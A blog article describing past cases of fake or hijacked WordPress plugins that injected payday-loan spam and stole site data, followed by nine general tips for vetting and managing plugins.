The 404 to 301 Payday Loan Spam Attack

The 404 to 301 Payday Loan Spam Attack

If you've ever built a WordPress website you know that Plugins offer many advantages that help you build them faster and with much more ease. The only problem, and it's not a small one, is that there are many plugins out there that can harm your computer and compromise your security on a major level, especially if you're not keeping a vigilant eye on them.

It’s widely known that a new tactic amongst some SEO’ers is to inject spam keywords and anchor text into unsuspecting websites through backdoors in popular plugins. This tactic, although starting in 2013, links the perpetrator to half a dozen other spam payday loan injections into wordpress plugins.

James Lewis, a Senior Business Analyst with Simple Payday, a payday loan lender in the UK, is involved with monitoring his sites performance and has noticed these spammers over the years.

“In the field of emergency loan lenders and brokers, there is enormous competition to be the number one result in the search engines. This need to get to number one has seen some websites, over the years, resort to tactics that aren’t too far away from criminal activity.”

Here's a fact; Upwards of 54% of all vulnerabilities detected on a WordPress website are associated with a plugin, making them the #1 cause of security breaches. Now, truth be told, many of these breaches can be traced back to user error, like when a plugin isn't updated on time. However, in some circumstances (which are growing in number all the time) the security issue has nothing to do with the user and everything to do with the hacker who injected the plugin you downloaded with malicious code.

In short, a fake plugin with the hostile intent of corrupting your computer so that it can be hacked. Even worse, these fake plugins can be awfully difficult to spot, until your websites search results are littered with payday loan terms on your dog grooming website.

Tricked by a Plugin? Don't Feel Too Bad, So Was Everyone Else

When creating a WordPress website every angle of attack by hackers needs to be locked down tight, especially when it involves direct visitor contact. That includes the Admin area too, of course, as well as your site's root directory. The problem with plugins however is that, if you don't see them as fakes before you install, you're now left with the unenviable task of trying to get rid of them from the inside rather than blocking them from the outside.

The truth is, the hackers who are creating these malicious plugins for WordPress know exactly what they're doing, and know exactly how to create code that passes the WordPress security scanners as legitimate (at least for a short time). Add to that the fact that some fake plugins started life as real plugins and you can see how difficult the problem of detecting them becomes.

Never seen or experienced a fake WordPress plugin? Before we go further and tell you how to avoid them, let's take a look at some infamous cases.

The Pingatorpin Plugin from 2013

In 2013 Sucuri, the website security company, accidentally came across dozens of websites that all shared the same set of files, all of which contained malware that was causing spam to run rampant on said websites. At the root of the problem was the Pingatorpin plugin which, even though they were a web security company Sucuri didn't detect until they started some heavy-duty digging..

The SI CAPTCHA Anti-Spam Plugin from 2017

A fake plugin that started life as a real one, the SI CAPTCHA Anti-Spam Plugin was a valid CAPTCHA plugin until it was purchased by another company. Once it was, the new owner secretly added code that, when activated, connected to a different server, and that server than injected payday loan ads into the blog posts of all the WordPress users who had the plugin. Even worse, this same scamming SOB created 8 more fake plugins that, among other things, gave them backdoor access to websites where they would run even more spam.

Fact is, the best (i.e. worst) hackers know they can do this, so they purchase the most well-known plugins for themselves and, once they have them, issue a plugin update with malicious code baked in. Crafty as they are, hackers know that the WordPress community is hyper-vigilant, and will rarely use a little-known plugin, so they buy one that's popular and has the highest chance of getting through unnoticed. Now that's devious.

The WP-BASE-SEO Plugin from 2017

In April of 2017 the WP-BASE-SEO Plugin was released and, once installed, nearly 4000 WordPress websites were immediately breached. What was different about the WP-BASE-SEO Plugin however was that it wasn't built from scratch and it wasn't an established and popular plugin either. No, in this case, the hacker copied the code from another plugin and used that code to get through the initial security scans. Luckily their plans were thwarted rather quickly when a base64 encoded PHP and some suspicious files were identified as the culprits.

The X-WP-SPAM-SHEILD-PRO Plugin

One of the most recent cases of fake plugins involving WordPress websites was the now infamous X-WP-SPAM-SHEILD-PRO Plugin debacle. At first this plugin appeared to be well-coded and secure, with folders structured similarly to safe, normal WordPress plugins. After several well-known websites were infected however, Sucuri encountered major code issues that, frankly, are quite terrifying.

The X-WP-SPAM-SHEILD-PRO Plugin, once installed, went directly after all of the most vital website information, including:

  • A list of all installed plugins
  • The current version of WordPress being used
  • The name of all users who were logged in, including sensitive material like passwords and IP addresses
  • The complete list of all the website's administrators

Once it had accomplished this first half of its mission, this rogue plugin had the power to do some incredibly damaging things to the website it infected.

  • Add a new user admin, giving that person the ability to roam at will
  • Deactivate security and other plugins
  • Upload any type of file it wanted to the infected website
  • Get an instant notification when the plugin was installed, to be able to start tearing it down immediately.

If you do anything with WordPress websites that knowledge should scare the bejeezus out of you, so let's stop looking at what might happen and start focusing on ways to make sure it doesn't happen.

Best WordPress Practices to Prevent Hackers from Raiding Your Website

Below are 9 of the best ways to prevent your website from being hacked (and help you sleep better at night). Read them, use them and come back to them for a refresher from time to time.

1- Perform a Quality Control Review

No matter where you find a plugin you wish to use, check it out extensively first using the below checklist.

  1. Check the reputation of the developer.
  2. Check the frequency of updates. Fakes will go for long periods without them and, even if they're not fake, they may be simply abandoned.
  3. Check how many users there are. The more, the better.
  4. Check the plugin's score. Lower than 4.5 usually means 'stay away'.
  5. Check any notes left by devs. If security is mentioned at all, give that plugin a 'no'.

It goes without saying that if you discover a plugin you want outside of normal WordPress channels, do your due diligence and research it thoroughly before installation.

2- Thoroughly Review all the code

Inspecting the file structure of a new (to you) plugin should be your first task. If it looks good, go deeper and look at the file coding. Any requests for sensitive information are a definite red flag.

3- Review the Plugins Bundled in Your Theme

Many WordPress themes come with plugins already bundled and, if they happen to be the infamous TimThumb, Gravity Forms or Slider Revolution plugins, you might be headed for trouble. These plugins slipped through the security cracks because they were already installed. So be sure to check your Theme occasionally and make sure there aren't any gremlins hiding in there.

4- Use a Well-known Security Plugin

It goes without saying that a security plugin is a vital tool that can protect your website and let you know when another plugin has been either flagged or removed.

5- Get a Vulnerability Scanner

Although it might not catch a fake plugin per-se, a good vulnerability scanner can alert you to spam, infections and malware, so it's a good choice to have one and use it.

6- Manage Your Plugins Like You Would Any Other Aspect of your Website

Many website owners look at plugins as a 'one-and-done' type of situation, but that is definitely not the case. Every plugin you're using should be;

  • Kept up-to-date
  • Deleted if it's old or you're not using it
  • Immediately removed if proven fake of it has serious security issues. (SiteLock can give you a list of the offending plugins.)

7- After Installing a Plugin, Review Your Entire Website

Just like when installing anything new onto your WordPress site, checking your website 'live' after you've installed a new plugin is a very good habit.

8- Take Advantage of the WPSCan Vulnerability Database

Made to detect any vulnerabilities in WordPress plugins and themes, this online tracker keeps a running list of them that you can check out any time you like. Best practices demand that you subscribe to their alerts so that you get notified whenever there's another added to the list.

9- Download and Use Plugins From Only The Best Sources

It goes without saying that you should only get your plugins from the best sources. Pressed for time? All the plugins you'd likely need for a high performance WordPress site can be found on WPMU DEV,

In Conclusion, Simply Be Vigilant

WordPress plugins make our online lives much easier, no doubt, even if they come with an inherent risk. To downgrade that risk takes vigilance, it's true, but if you follow the 9 best Practices above and monitor your plugins regularly, you'll get the excellent benefits plugins deliver without all the headaches of payday loan anchor text and ads on your website about 1950’s trains. Just what you don’t need when you’re trying to locate a 1958 Super Chief Streamliner.

Leave a Reply